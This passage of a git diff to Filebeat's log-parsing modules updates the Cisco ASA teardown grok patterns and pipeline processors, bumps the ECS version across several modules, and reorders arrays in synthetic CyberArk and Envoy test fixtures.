%{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:%{NOTSPACE:_temp_.cisco.destination_username} )?duration (?:%{TIME:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) %{NOTCOLON:event.reason} + - Teardown %{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:%{NOTSPACE:_temp_.cisco.source_username} )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:%{NOTSPACE:_temp_.cisco.destination_username} )?duration (?:%{TIME:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) + - Teardown %{NOTSPACE:network.transport} connection for faddr (?:%{NOTCOLON:_temp_.cisco.source_interface}:)?%{ECSDESTIPORHOST}/%{NUMBER}\s*(?:\(%{NOTSPACE:_temp_.cisco.destination_username}\) )?gaddr (?:%{NOTCOLON}:)?%{MAPPEDSRC}/%{NUMBER} laddr (?:%{NOTCOLON:_temp_.cisco.source_interface}:)?%{ECSSOURCEIPORHOST}/%{NUMBER}\s*(?:\(%{NOTSPACE:_temp_.cisco.source_username}\))?(\s*type %{NUMBER:_temp_.cisco.icmp_type} code %{NUMBER:_temp_.cisco.icmp_code})? pattern_definitions: NOTCOLON: "[^:]*" ECSSOURCEIPORHOST: "(?:%{IP:source.address}|%{HOSTNAME:source.domain})" @@ -606,6 +714,7 @@ processors: - kv: if: '["430001", "430002", "430003", "430004", "430005", ""].contains(ctx._temp_.cisco.message_id)' field: "message" + description: "430001, 430002, 430003, 430004, 430005" field_split: ",(?=[A-za-z1-9\\s]+:)" value_split: ":" target_field: "_temp_.orig_security" @@ -1238,7 +1347,7 @@ processors: value: "ipv6-icmp" # - # Convert integer fields, as output of dissect and kv processors is always a string + # Convert numeric fields to integer or long, as output of dissect and kv processors is always a string # - convert: field: "source.port" @@ -1250,11 +1359,15 @@ processors: ignore_failure: true - convert: field: "source.bytes" - type: integer + type: long ignore_failure: true - convert: field: "destination.bytes" - type: integer + type: long + ignore_failure: true + - convert: + field: "network.bytes" + type: long ignore_failure: true - convert: field: "source.packets" @@ -1614,15 +1727,25 @@ processors: value: "{{source.ip}}" if: "ctx?.source?.ip != null" allow_duplicates: false + - append: + field: related.ip + value: "{{source.nat.ip}}" + if: "ctx?.source?.nat?.ip != null" + allow_duplicates: false - append: field: related.ip value: "{{destination.ip}}" if: "ctx?.destination?.ip != null" allow_duplicates: false + - append: + field: related.ip + value: "{{destination.nat.ip}}" + if: "ctx?.destination?.nat?.ip != null" + allow_duplicates: false - append: field: related.user value: "{{user.name}}" - if: "ctx?.user?.name != null && ctx?.user?.name != ''" + if: ctx?.user?.name != null && ctx?.user?.name != '' allow_duplicates: false - append: field: related.user @@ -1637,8 +1760,8 @@ processors: - append: field: related.user value: "{{destination.user.name}}" + if: ctx?.destination?.user?.name != null && ctx?.destination?.user?.name != '' allow_duplicates: false - if: "ctx?.destination?.user?.name != null" - append: field: related.hash value: "{{file.hash.sha256}}" diff --git a/x-pack/filebeat/module/cisco/umbrella/config/input.yml b/x-pack/filebeat/module/cisco/umbrella/config/input.yml index d2da78cc349..0e81d3eab78 100644 --- a/x-pack/filebeat/module/cisco/umbrella/config/input.yml +++ b/x-pack/filebeat/module/cisco/umbrella/config/input.yml @@ -22,4 +22,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/coredns/log/config/coredns.yml b/x-pack/filebeat/module/coredns/log/config/coredns.yml index 162208f2e80..0b63ac697fa 100644 --- a/x-pack/filebeat/module/coredns/log/config/coredns.yml +++ b/x-pack/filebeat/module/coredns/log/config/coredns.yml @@ -9,4 +9,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/crowdstrike/falcon/config/falcon.yml b/x-pack/filebeat/module/crowdstrike/falcon/config/falcon.yml index de7c32e3d3b..9550bbc6ea7 100644 --- a/x-pack/filebeat/module/crowdstrike/falcon/config/falcon.yml +++ b/x-pack/filebeat/module/crowdstrike/falcon/config/falcon.yml @@ -30,4 +30,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/cyberark/corepas/config/input.yml b/x-pack/filebeat/module/cyberark/corepas/config/input.yml index 49b1e4ef20b..9136df99056 100644 --- a/x-pack/filebeat/module/cyberark/corepas/config/input.yml +++ b/x-pack/filebeat/module/cyberark/corepas/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/cyberark/corepas/test/generated.log-expected.json b/x-pack/filebeat/module/cyberark/corepas/test/generated.log-expected.json index 85e28bf8beb..ca6998d7db6 100644 --- a/x-pack/filebeat/module/cyberark/corepas/test/generated.log-expected.json +++ b/x-pack/filebeat/module/cyberark/corepas/test/generated.log-expected.json @@ -64,17 +64,17 @@ "observer.vendor": "Cyberark", "observer.version": "1.259", "related.hosts": [ - "volup208.invalid", - "iatnu3810.mail.localdomain" + "iatnu3810.mail.localdomain", + "volup208.invalid" ], "related.ip": [ "10.92.136.230", "10.175.75.18" ], "related.user": [ - "dolore", "nnumqu", - "orev" + "orev", + "dolore" ], "rsa.db.database": "umdo", "rsa.db.index": "vol", @@ -131,17 +131,17 @@ "observer.vendor": "Cyberark", "observer.version": "1.7269", "related.hosts": [ - "anti4454.api.example", - "tetu5280.www5.invalid" + "tetu5280.www5.invalid", + "anti4454.api.example" ], "related.ip": [ "10.51.132.10", "10.46.185.46" ], "related.user": [ - "incid", + "serror", "nse", - "serror" + "incid" ], "rsa.db.database": "byC", "rsa.db.index": "tur", @@ -206,8 +206,8 @@ "10.155.236.240" ], "related.user": [ - "atcup", "ptass", + "atcup", "psumquia" ], "rsa.db.database": "aperi", @@ -265,8 +265,8 @@ "10.81.199.122" ], "related.user": [ - "giatq", "oremips", + "giatq", "eos" ], "rsa.db.index": "tempo", @@ -317,9 +317,9 @@ "10.172.14.142" ], "related.user": [ - "aboris", "tcupida", - "uam" + "uam", + "aboris" ], "rsa.db.database": "isiu", "rsa.db.index": "iatisu", @@ -376,17 +376,17 @@ "observer.vendor": "Cyberark", "observer.version": "1.6875", "related.hosts": [ - "tenbyCic5882.api.home", - "amquisno3338.www5.lan" + "amquisno3338.www5.lan", + "tenbyCic5882.api.home" ], "related.ip": [ - "10.104.111.129", - "10.47.76.251" + "10.47.76.251", + "10.104.111.129" ], "related.user": [ + "etconsec", "ipis", - "ele", - "etconsec" + "ele" ], "rsa.db.database": "riat", "rsa.db.index": "umdolor", @@ -443,9 +443,9 @@ "10.116.120.216" ], "related.user": [ - "quiratio", "umdo", - "animi" + "animi", + "quiratio" ], "rsa.db.index": "oll", "rsa.internal.event_desc": "rumet", @@ -487,17 +487,17 @@ "observer.vendor": "Cyberark", "observer.version": "1.5529", "related.hosts": [ - "idolores3839.localdomain", - "isqu7224.localdomain" + "isqu7224.localdomain", + "idolores3839.localdomain" ], "related.ip": [ - "10.62.54.220", - "10.57.40.29" + "10.57.40.29", + "10.62.54.220" ], "related.user": [ - "taevi", + "rnatura", "psum", - "rnatura" + "taevi" ], "rsa.db.database": "emeumfug", "rsa.db.index": "omn", @@ -553,8 +553,8 @@ "10.74.237.180" ], "related.user": [ - "cup", "tnon", + "cup", "ema" ], "rsa.db.index": "remeumf", @@ -597,9 +597,9 @@ "10.18.165.35" ], "related.user": [ - "remeum", "modocons", - "lor" + "lor", + "remeum" ], "rsa.db.index": "etM", "rsa.internal.event_desc": "etc", @@ -793,9 +793,9 @@ "10.18.109.121" ], "related.user": [ - "pida", + "hil", "tatn", - "hil" + "pida" ], "rsa.db.index": "quip", "rsa.internal.event_desc": "ecillu", @@ -837,16 +837,16 @@ "observer.vendor": "Cyberark", "observer.version": "1.3727", "related.hosts": [ - "rpo79.mail.example", - "iavolu5352.localhost" + "iavolu5352.localhost", + "rpo79.mail.example" ], "related.ip": [ "10.63.37.192", "10.225.115.13" ], "related.user": [ - "reetd", "equep", + "reetd", "iunt" ], "rsa.db.database": "aliqu", @@ -903,17 +903,17 @@ "observer.vendor": "Cyberark", "observer.version": "1.3219", "related.hosts": [ - "tionof7613.domain", - "estiae3750.api.corp" + "estiae3750.api.corp", + "tionof7613.domain" ], "related.ip": [ "10.95.64.124", "10.47.202.102" ], "related.user": [ - "run", + "ntor", "ice", - "ntor" + "run" ], "rsa.db.database": "ite", "rsa.db.index": "iquipex", @@ -969,16 +969,16 @@ "observer.vendor": "Cyberark", "observer.version": "1.6371", "related.hosts": [ - "acc7692.home", - "aquaeabi7735.internal.lan" + "aquaeabi7735.internal.lan", + "acc7692.home" ], "related.ip": [ "10.244.114.61", "10.106.239.55" ], "related.user": [ - "serunt", - "itquiin" + "itquiin", + "serunt" ], "rsa.db.database": "itame", "rsa.db.index": "oluptas", @@ -1034,17 +1034,17 @@ "observer.vendor": "Cyberark", "observer.version": "1.821", "related.hosts": [ - "etMalor4236.www5.host", - "quatD4191.local" + "quatD4191.local", + "etMalor4236.www5.host" ], "related.ip": [ - "10.53.168.235", - "10.125.160.129" + "10.125.160.129", + "10.53.168.235" ], "related.user": [ - "ione", "one", - "abi" + "abi", + "ione" ], "rsa.db.database": "sperna", "rsa.db.index": "estia", @@ -1109,9 +1109,9 @@ "10.227.177.121" ], "related.user": [ + "liqui", "tasuntex", - "iduntu", - "liqui" + "iduntu" ], "rsa.db.database": "rvel", "rsa.db.index": "onsecte", @@ -1180,8 +1180,8 @@ "10.167.85.181" ], "related.user": [ - "econs", - "fde" + "fde", + "econs" ], "rsa.db.database": "equat", "rsa.internal.event_desc": "orpor", @@ -1240,8 +1240,8 @@ ], "related.user": [ "icabo", - "sintoc", - "iciadese" + "iciadese", + "sintoc" ], "rsa.db.index": "eni", "rsa.internal.event_desc": "rcitati", @@ -1287,13 +1287,13 @@ "nevo4284.internal.local" ], "related.ip": [ - "10.72.148.32", - "10.214.191.180" + "10.214.191.180", + "10.72.148.32" ], "related.user": [ "uteirure", - "tDuisaut", - "luptatev" + "luptatev", + "tDuisaut" ], "rsa.db.database": "uamest", "rsa.db.index": "uae", @@ -1350,12 +1350,12 @@ "observer.vendor": "Cyberark", "observer.version": "1.3599", "related.hosts": [ - "itas981.mail.domain", - "mporin6932.api.localdomain" + "mporin6932.api.localdomain", + "itas981.mail.domain" ], "related.ip": [ - "10.252.124.150", - "10.136.190.236" + "10.136.190.236", + "10.252.124.150" ], "related.user": [ "com", @@ -1421,8 +1421,8 @@ "illoin2914.mail.lan" ], "related.ip": [ - "10.192.34.76", - "10.213.144.249" + "10.213.144.249", + "10.192.34.76" ], "related.user": [ "temqu", @@ -1490,8 +1490,8 @@ "10.216.84.30" ], "related.user": [ - "intoc", - "untu" + "untu", + "intoc" ], "rsa.db.database": "oditem", "rsa.db.index": "borios", @@ -1547,9 +1547,9 @@ "10.143.193.199" ], "related.user": [ - "quid", "niamqui", - "tqu" + "tqu", + "quid" ], "rsa.db.index": "inci", "rsa.internal.event_desc": "eroinBCS", @@ -1595,12 +1595,12 @@ "uamei2389.internal.example" ], "related.ip": [ - "10.65.175.9", - "10.193.83.81" + "10.193.83.81", + "10.65.175.9" ], "related.user": [ - "essequam", "umqu", + "essequam", "ritatise" ], "rsa.db.database": "ender", @@ -1658,9 +1658,9 @@ "10.205.72.243" ], "related.user": [ - "isiuta", "tatn", - "umdolo" + "umdolo", + "isiuta" ], "rsa.db.index": "proide", "rsa.internal.event_desc": "ameiusm", @@ -1702,8 +1702,8 @@ "10.107.9.163" ], "related.user": [ - "mquisno", "sit", + "mquisno", "mac" ], "rsa.db.index": "sit", @@ -1790,17 +1790,17 @@ "observer.vendor": "Cyberark", "observer.version": "1.267", "related.hosts": [ - "miurerep1152.internal.domain", - "utlab3706.api.host" + "utlab3706.api.host", + "miurerep1152.internal.domain" ], "related.ip": [ - "10.39.10.155", - "10.235.136.109" + "10.235.136.109", + "10.39.10.155" ], "related.user": [ "aboreetd", - "urExcept", - "ptass" + "ptass", + "urExcept" ], "rsa.db.database": "teirured", "rsa.db.index": "dolorem", @@ -1901,9 +1901,9 @@ "10.71.238.250" ], "related.user": [ - "aec", "reseo", - "moenimi" + "moenimi", + "aec" ], "rsa.db.index": "mac", "rsa.internal.event_desc": "quamest", @@ -1953,9 +1953,9 @@ "10.226.101.180" ], "related.user": [ + "rationev", "ritt", - "veniamqu", - "rationev" + "veniamqu" ], "rsa.db.database": "conse", "rsa.db.index": "imveniam", @@ -2016,12 +2016,12 @@ "perspici5680.domain" ], "related.ip": [ - "10.134.65.15", - "10.86.22.67" + "10.86.22.67", + "10.134.65.15" ], "related.user": [ - "utaliqu", "cab", + "utaliqu", "quaUten" ], "rsa.db.database": "isciv", @@ -2126,16 +2126,16 @@ "observer.vendor": "Cyberark", "observer.version": "1.6255", "related.hosts": [ - "tesse1089.www.host", - "ptateve6909.www5.lan" + "ptateve6909.www5.lan", + "tesse1089.www.host" ], "related.ip": [ "10.178.242.100", "10.24.111.229" ], "related.user": [ - "dqu", "loi", + "dqu", "idid" ], "rsa.db.database": "tenatuse", @@ -2193,9 +2193,9 @@ "10.211.179.168" ], "related.user": [ - "ritati", "untincul", - "mmodoc" + "mmodoc", + "ritati" ], "rsa.db.index": "emvele", "rsa.internal.event_desc": "oluptas", @@ -2237,9 +2237,9 @@ "10.30.243.163" ], "related.user": [ - "illu", "dolore", - "mven" + "mven", + "illu" ], "rsa.db.index": "idol", "rsa.internal.event_desc": "lore", @@ -2289,8 +2289,8 @@ "10.6.79.159" ], "related.user": [ - "midestl", "amvo", + "midestl", "quid" ], "rsa.db.database": "urExce", @@ -2348,16 +2348,16 @@ "observer.vendor": "Cyberark", "observer.version": "1.3546", "related.hosts": [ - "aecatcup2241.www5.test", - "tempor1282.www5.localhost" + "tempor1282.www5.localhost", + "aecatcup2241.www5.test" ], "related.ip": [ - "10.237.170.202", - "10.70.147.46" + "10.70.147.46", + "10.237.170.202" ], "related.user": [ - "atDu", "liquide", + "atDu", "rcit" ], "rsa.db.database": "taedict", @@ -2419,13 +2419,13 @@ "mipsum2964.invalid" ], "related.ip": [ - "10.179.50.138", - "10.228.118.81" + "10.228.118.81", + "10.179.50.138" ], "related.user": [ - "itasper", + "emoe", "tatemU", - "emoe" + "itasper" ], "rsa.db.database": "toditaut", "rsa.db.index": "ugit", @@ -2486,13 +2486,13 @@ "veniamq1236.invalid" ], "related.ip": [ - "10.49.71.118", - "10.234.165.130" + "10.234.165.130", + "10.49.71.118" ], "related.user": [ + "emip", "iuntNequ", - "henderit", - "emip" + "henderit" ], "rsa.db.database": "veniamqu", "rsa.db.index": "atquo", @@ -2549,9 +2549,9 @@ "10.199.5.49" ], "related.user": [ - "olorema", "emip", - "turadipi" + "turadipi", + "olorema" ], "rsa.db.index": "ataevi", "rsa.internal.event_desc": "minim", @@ -2641,8 +2641,8 @@ "taliqui5348.mail.localdomain" ], "related.ip": [ - "10.174.185.109", - "10.120.167.217" + "10.120.167.217", + "10.174.185.109" ], "related.user": [ "dolorem", @@ -2712,8 +2712,8 @@ ], "related.user": [ "atev", - "ate", - "accusa" + "accusa", + "ate" ], "rsa.db.database": "nibus", "rsa.db.index": "ser", @@ -2777,8 +2777,8 @@ "10.166.90.130" ], "related.user": [ - "eavol", "etconsec", + "eavol", "rem" ], "rsa.db.database": "oditempo", @@ -2838,16 +2838,16 @@ "observer.vendor": "Cyberark", "observer.version": "1.2456", "related.hosts": [ - "tatio6513.www.invalid", - "onnu2272.mail.corp" + "onnu2272.mail.corp", + "tatio6513.www.invalid" ], "related.ip": [ "10.38.28.151", "10.201.81.46" ], "related.user": [ - "tiumto", "mipsumqu", + "tiumto", "incidid" ], "rsa.db.database": "abor", @@ -2911,12 +2911,12 @@ "dolori6232.api.invalid" ], "related.ip": [ - "10.255.28.56", - "10.214.245.95" + "10.214.245.95", + "10.255.28.56" ], "related.user": [ - "uptatem", "rerepre", + "uptatem", "umdolors" ], "rsa.db.database": "odt", @@ -2974,9 +2974,9 @@ "10.45.35.180" ], "related.user": [ - "qui", + "Utenima", "mip", - "Utenima" + "qui" ], "rsa.db.index": "boree", "rsa.internal.event_desc": "uteir", @@ -3018,8 +3018,8 @@ "10.141.200.133" ], "related.user": [ - "ess", "iame", + "ess", "enim" ], "rsa.db.index": "nofdeFi", @@ -3110,13 +3110,13 @@ "mestq2106.api.host" ], "related.ip": [ - "10.39.143.155", - "10.41.89.217" + "10.41.89.217", + "10.39.143.155" ], "related.user": [ - "sedquiac", + "tperspic", "tem", - "tperspic" + "sedquiac" ], "rsa.db.database": "radipis", "rsa.db.index": "nse", @@ -3177,13 +3177,13 @@ "reseosqu1629.mail.lan" ], "related.ip": [ - "10.153.123.20", - "10.5.5.1" + "10.5.5.1", + "10.153.123.20" ], "related.user": [ - "CSe", + "minim", "unt", - "minim" + "CSe" ], "rsa.db.database": "atu", "rsa.db.index": "roi", @@ -3244,13 +3244,13 @@ "olu5333.www.domain" ], "related.ip": [ - "10.168.132.175", - "10.210.61.109" + "10.210.61.109", + "10.168.132.175" ], "related.user": [ "iamea", - "giatquov", - "eursinto" + "eursinto", + "giatquov" ], "rsa.db.database": "ici", "rsa.db.index": "iquaUt", @@ -3307,9 +3307,9 @@ "10.123.154.17" ], "related.user": [ - "lmo", "dolorsi", - "quiac" + "quiac", + "lmo" ], "rsa.db.index": "idunt", "rsa.internal.event_desc": "usantiu", @@ -3353,8 +3353,8 @@ ], "related.user": [ "etquasia", - "oeni", - "xplic" + "xplic", + "oeni" ], "rsa.db.index": "hend", "rsa.internal.event_desc": "piscivel", @@ -3448,12 +3448,12 @@ "mmodoco2581.www5.host" ], "related.ip": [ - "10.169.101.161", - "10.164.66.154" + "10.164.66.154", + "10.169.101.161" ], "related.user": [ - "eufug", "orissu", + "eufug", "ine" ], "rsa.db.database": "stquidol", @@ -3510,9 +3510,9 @@ "10.70.83.200" ], "related.user": [ - "metco", "ihilmole", - "riat" + "riat", + "metco" ], "rsa.db.index": "urQuis", "rsa.internal.event_desc": "iutaliq", @@ -3562,9 +3562,9 @@ "10.134.55.11" ], "related.user": [ - "madminim", + "mmod", "tanimid", - "mmod" + "madminim" ], "rsa.db.database": "tetura", "rsa.db.index": "uptasnul", @@ -3621,17 +3621,17 @@ "observer.vendor": "Cyberark", "observer.version": "1.3601", "related.hosts": [ - "eve234.www5.local", - "rehen4859.api.host" + "rehen4859.api.host", + "eve234.www5.local" ], "related.ip": [ - "10.31.187.19", - "10.52.150.104" + "10.52.150.104", + "10.31.187.19" ], "related.user": [ "eritq", - "oinBCSed", - "texplica" + "texplica", + "oinBCSed" ], "rsa.db.database": "lit", "rsa.db.index": "ritati", @@ -3692,13 +3692,13 @@ "eufugia4481.corp" ], "related.ip": [ - "10.41.232.147", - "10.61.175.217" + "10.61.175.217", + "10.41.232.147" ], "related.user": [ "tat", - "ntexpl", - "runtm" + "runtm", + "ntexpl" ], "rsa.db.database": "rere", "rsa.db.index": "nonn", @@ -3754,8 +3754,8 @@ "10.150.30.95" ], "related.user": [ - "mini", "uisnos", + "mini", "atnonpr" ], "rsa.db.index": "smod", @@ -3798,8 +3798,8 @@ "10.98.71.45" ], "related.user": [ - "CSe", "onse", + "CSe", "fugitse" ], "rsa.db.index": "Dui", @@ -3842,9 +3842,9 @@ "10.252.251.143" ], "related.user": [ + "nonn", "rspic", - "remq", - "nonn" + "remq" ], "rsa.db.index": "nre", "rsa.internal.event_desc": "tev", @@ -3886,9 +3886,9 @@ "10.197.203.167" ], "related.user": [ - "iumdo", "eserun", - "uta" + "uta", + "iumdo" ], "rsa.db.index": "smo", "rsa.internal.event_desc": "olesti", @@ -3930,9 +3930,9 @@ "10.187.170.23" ], "related.user": [ + "sectetu", "enima", - "ibusBo", - "sectetu" + "ibusBo" ], "rsa.db.index": "uido", "rsa.internal.event_desc": "lab", @@ -3974,8 +3974,8 @@ "observer.vendor": "Cyberark", "observer.version": "1.3824", "related.hosts": [ - "involu1450.www.localhost", - "udexerc2708.api.test" + "udexerc2708.api.test", + "involu1450.www.localhost" ], "related.ip": [ "10.250.248.215", @@ -3983,8 +3983,8 @@ ], "related.user": [ "tinculpa", - "aevitaed", - "quaeratv" + "quaeratv", + "aevitaed" ], "rsa.db.database": "lica", "rsa.db.index": "uisnos", @@ -4040,8 +4040,8 @@ "observer.vendor": "Cyberark", "observer.version": "1.3759", "related.hosts": [ - "osa3211.www5.example", - "temvele5776.www.test" + "temvele5776.www.test", + "osa3211.www5.example" ], "related.ip": [ "10.146.57.23", @@ -4106,8 +4106,8 @@ ], "related.user": [ "ptatemU", - "niamqui", - "uamestqu" + "uamestqu", + "niamqui" ], "rsa.db.index": "doeiu", "rsa.internal.event_desc": "uasiarc", @@ -4149,9 +4149,9 @@ "10.154.172.82" ], "related.user": [ + "nesci", "onnumqua", - "tetura", - "nesci" + "tetura" ], "rsa.db.index": "oinBCSed", "rsa.internal.event_desc": "ntor", @@ -4194,8 +4194,8 @@ ], "related.user": [ "expl", - "midestl", - "tpers" + "tpers", + "midestl" ], "rsa.db.index": "olu", "rsa.internal.event_desc": "odocons", @@ -4238,8 +4238,8 @@ ], "related.user": [ "turQuis", - "olupta", - "fdeFinib" + "fdeFinib", + "olupta" ], "rsa.db.index": "rsint", "rsa.internal.event_desc": "odico", @@ -4281,8 +4281,8 @@ "observer.vendor": "Cyberark", "observer.version": "1.6648", "related.hosts": [ - "tatemac5192.www5.test", - "teursint1321.www5.example" + "teursint1321.www5.example", + "tatemac5192.www5.test" ], "related.ip": [ "10.85.13.237", @@ -4290,8 +4290,8 @@ ], "related.user": [ "Nem", - "luptat", - "emeu" + "emeu", + "luptat" ], "rsa.db.database": "nturmag", "rsa.db.index": "maliqua", @@ -4348,17 +4348,17 @@ "observer.vendor": "Cyberark", "observer.version": "1.3387", "related.hosts": [ - "nimve2787.mail.test", - "boreet2051.internal.localdomain" + "boreet2051.internal.localdomain", + "nimve2787.mail.test" ], "related.ip": [ "10.222.32.183", "10.65.207.234" ], "related.user": [ - "eve", + "itame", "eruntmo", - "itame" + "eve" ], "rsa.db.database": "udexerc", "rsa.db.index": "volup", @@ -4415,8 +4415,8 @@ "10.16.181.60" ], "related.user": [ - "olore", "oinven", + "olore", "gnama" ], "rsa.db.index": "uatu", @@ -4460,8 +4460,8 @@ ], "related.user": [ "amnis", - "illoin", - "uianon" + "uianon", + "illoin" ], "rsa.db.index": "ons", "rsa.internal.event_desc": "temaccus", @@ -4503,9 +4503,9 @@ "10.204.214.98" ], "related.user": [ - "porissus", + "tdolo", "eprehe", - "tdolo" + "porissus" ], "rsa.db.index": "abo", "rsa.internal.event_desc": "ecte", @@ -4548,8 +4548,8 @@ ], "related.user": [ "etc", - "evel", - "moenimip" + "moenimip", + "evel" ], "rsa.db.index": "iarchit", "rsa.internal.event_desc": "apari", @@ -4591,8 +4591,8 @@ "observer.vendor": "Cyberark", "observer.version": "1.801", "related.hosts": [ - "umto3015.mail.lan", - "ama6820.mail.example" + "ama6820.mail.example", + "umto3015.mail.lan" ], "related.ip": [ "10.26.33.181", @@ -4662,13 +4662,13 @@ "etquasia1800.www.host" ], "related.ip": [ - "10.142.161.116", - "10.148.195.208" + "10.148.195.208", + "10.142.161.116" ], "related.user": [ "mpori", - "quaerat", - "isi" + "isi", + "quaerat" ], "rsa.db.database": "squamest", "rsa.db.index": "pteu", @@ -4729,13 +4729,13 @@ "lit4112.www.localhost" ], "related.ip": [ - "10.10.174.253", - "10.107.24.54" + "10.107.24.54", + "10.10.174.253" ], "related.user": [ - "itinvo", + "hend", "uptasn", - "hend" + "itinvo" ], "rsa.db.database": "lup", "rsa.db.index": "isau", @@ -4793,8 +4793,8 @@ "10.87.92.17" ], "related.user": [ - "luptate", "tamr", + "luptate", "eeufug" ], "rsa.db.index": "oreeufug", @@ -4841,16 +4841,16 @@ "observer.vendor": "Cyberark", "observer.version": "1.5649", "related.hosts": [ - "secte1774.localhost", - "dictasun3408.internal.invalid" + "dictasun3408.internal.invalid", + "secte1774.localhost" ], "related.ip": [ "10.161.51.135", "10.231.51.136" ], "related.user": [ - "asper", "Finibus", + "asper", "accus" ], "rsa.db.database": "litani", @@ -4908,8 +4908,8 @@ "10.51.17.32" ], "related.user": [ - "llum", "itten", + "llum", "mquido" ], "rsa.db.index": "uscipit", @@ -4952,8 +4952,8 @@ "10.108.123.148" ], "related.user": [ - "mmodicon", "ollita", + "mmodicon", "cusa" ], "rsa.db.index": "ercitati", @@ -5005,9 +5005,9 @@ "10.114.0.148" ], "related.user": [ - "equatD", + "ons", "rsitamet", - "ons" + "equatD" ], "rsa.db.database": "periam", "rsa.db.index": "umiurer", @@ -5069,8 +5069,8 @@ ], "related.user": [ "loru", - "naaliq", - "equa" + "equa", + "naaliq" ], "rsa.db.index": "umfugiat", "rsa.internal.event_desc": "ora", @@ -5116,12 +5116,12 @@ "quame1852.www.test" ], "related.ip": [ - "10.149.238.108", - "10.93.24.151" + "10.93.24.151", + "10.149.238.108" ], "related.user": [ - "ite", "nven", + "ite", "sequamn" ], "rsa.db.database": "fugi", @@ -5178,9 +5178,9 @@ "10.101.45.225" ], "related.user": [ - "uinesc", + "cipitla", "emi", - "cipitla" + "uinesc" ], "rsa.db.index": "caecat", "rsa.internal.event_desc": "tsunt", @@ -5224,8 +5224,8 @@ ], "related.user": [ "ore", - "eumfugia", - "quela" + "quela", + "eumfugia" ], "rsa.db.index": "olup", "rsa.internal.event_desc": "quuntur", @@ -5315,17 +5315,17 @@ "observer.vendor": "Cyberark", "observer.version": "1.3175", "related.hosts": [ - "isno4595.local", - "lla5407.lan" + "lla5407.lan", + "isno4595.local" ], "related.ip": [ "10.94.152.238", "10.151.110.250" ], "related.user": [ - "pidatatn", + "neavol", "tla", - "neavol" + "pidatatn" ], "rsa.db.database": "itaedict", "rsa.db.index": "onemull", @@ -5381,17 +5381,17 @@ "observer.vendor": "Cyberark", "observer.version": "1.4965", "related.hosts": [ - "tatemse5403.home", - "iquipexe4708.api.localhost" + "iquipexe4708.api.localhost", + "tatemse5403.home" ], "related.ip": [ - "10.77.9.17", - "10.146.61.5" + "10.146.61.5", + "10.77.9.17" ], "related.user": [ - "umS", "alorumwr", - "tevel" + "tevel", + "umS" ], "rsa.db.database": "amremap", "rsa.db.index": "aqu", @@ -5447,9 +5447,9 @@ "10.128.102.130" ], "related.user": [ + "ore", "que", - "sequatu", - "ore" + "sequatu" ], "rsa.db.index": "exerci", "rsa.internal.event_desc": "olu", @@ -5491,17 +5491,17 @@ "observer.vendor": "Cyberark", "observer.version": "1.7701", "related.hosts": [ - "reprehe650.www.corp", - "oremip4070.www5.invalid" + "oremip4070.www5.invalid", + "reprehe650.www.corp" ], "related.ip": [ - "10.200.162.248", - "10.31.86.83" + "10.31.86.83", + "10.200.162.248" ], "related.user": [ + "reseo", "doloremi", - "onnu", - "reseo" + "onnu" ], "rsa.db.database": "billo", "rsa.db.index": "ectetura", @@ -5558,9 +5558,9 @@ "10.103.215.159" ], "related.user": [ - "apa", + "atatn", "volup", - "atatn" + "apa" ], "rsa.db.index": "atcupi", "rsa.internal.event_desc": "did", diff --git a/x-pack/filebeat/module/cylance/protect/config/input.yml b/x-pack/filebeat/module/cylance/protect/config/input.yml index 9e7cfc5a0fd..d8d73c4fd07 100644 --- a/x-pack/filebeat/module/cylance/protect/config/input.yml +++ b/x-pack/filebeat/module/cylance/protect/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/envoyproxy/log/config/envoyproxy.yml b/x-pack/filebeat/module/envoyproxy/log/config/envoyproxy.yml index 162208f2e80..0b63ac697fa 100644 --- a/x-pack/filebeat/module/envoyproxy/log/config/envoyproxy.yml +++ b/x-pack/filebeat/module/envoyproxy/log/config/envoyproxy.yml @@ -9,4 +9,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/envoyproxy/log/test/envoy-json.log-expected.json b/x-pack/filebeat/module/envoyproxy/log/test/envoy-json.log-expected.json index 483625d8bea..08ce9bed8de 100644 --- a/x-pack/filebeat/module/envoyproxy/log/test/envoy-json.log-expected.json +++ b/x-pack/filebeat/module/envoyproxy/log/test/envoy-json.log-expected.json @@ -62,6 +62,7 @@ "url.domain": "httpbin.org", "url.path": "/httpbin/status/501", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "curl", "user_agent.original": "curl/7.59.0", "user_agent.version": "7.59.0" diff --git a/x-pack/filebeat/module/envoyproxy/log/test/envoy.log-expected.json b/x-pack/filebeat/module/envoyproxy/log/test/envoy.log-expected.json index 703b5e977b3..90636c4b66a 100644 --- a/x-pack/filebeat/module/envoyproxy/log/test/envoy.log-expected.json +++ b/x-pack/filebeat/module/envoyproxy/log/test/envoy.log-expected.json @@ -80,6 +80,7 @@ "url.domain": "localhost:8000", "url.path": "/service/1", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "curl", "user_agent.original": "curl/7.54.0", "user_agent.version": "7.54.0" @@ -129,6 +130,7 @@ "url.domain": "192.168.99.107:30901", "url.path": "/elastic", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "curl", "user_agent.original": "curl/7.59.0", "user_agent.version": "7.59.0" @@ -187,6 +189,7 @@ "url.domain": 